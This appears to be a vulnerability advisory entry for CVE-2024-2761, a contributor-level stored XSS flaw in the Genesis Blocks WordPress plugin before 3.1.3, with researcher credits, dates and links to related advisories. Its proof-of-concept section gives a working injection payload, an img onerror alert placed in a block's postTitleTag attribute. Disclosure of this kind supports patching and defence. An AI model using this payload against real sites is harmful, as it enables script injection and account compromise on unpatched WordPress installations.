Genesis Blocks < 3.1.3 – Contributor+ Stored XSS | CVE 2024-2761 | Plugin Vulnerabilities

Description

The plugin does not properly escape data input provided to some of its blocks, allowing using with at least contributor privileges to conduct Stored XSS attacks.

Proof of Concept

As a contributor, put the below code in a post while in Code Editor mode

<!-- wp:genesis-blocks/gb-post-grid {"postTitleTag":"img src=x onerror=alert(/XSS-postTitleTag/) style=width:150px;","readMoreText":"Continue Reading"} /-->

The XSS will be triggered when viewing/previewing the post

Affects Plugins

Fixed in 3.1.3

References

CVE

URL

https://research.cleantalk.org/cve-2024-2761/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Original Researcher

Dmitrii Ignatyev

Submitter

Dmitrii Ignatyev

Submitter website

https://research.cleantalk.org

Verified

Yes

WPVDB ID

e092ccdc-7ea1-4937-97b7-4cdbff5e74e5

Timeline

Publicly Published

2024-03-29 (about 1 months ago)

Added

2024-03-29 (about 1 months ago)

Last Updated

2024-04-04 (about 1 months ago)

Other

Published

Title

Published

2019-05-04

Title

All-in-One Event Calendar <= 2.5.38 - Cross-Site Scripting (XSS)

Published

2021-12-06

Title

Multivendor Marketplace Solution for WooCommerce < 3.8.4 - Reflected Cross-Site Scripting

Published

2023-10-18

Title

Bulk NoIndex & NoFollow Toolkit < 1.5 - Reflected XSS

Published

2014-11-30

Title

WordPress 3.9, 3.9.1, 3.9.2, 4.0 - XSS in Media Playlists

Published

2021-11-01

Title

Google Maps Easy < 1.10.1 - Admin+ Stored Cross-Site Scripting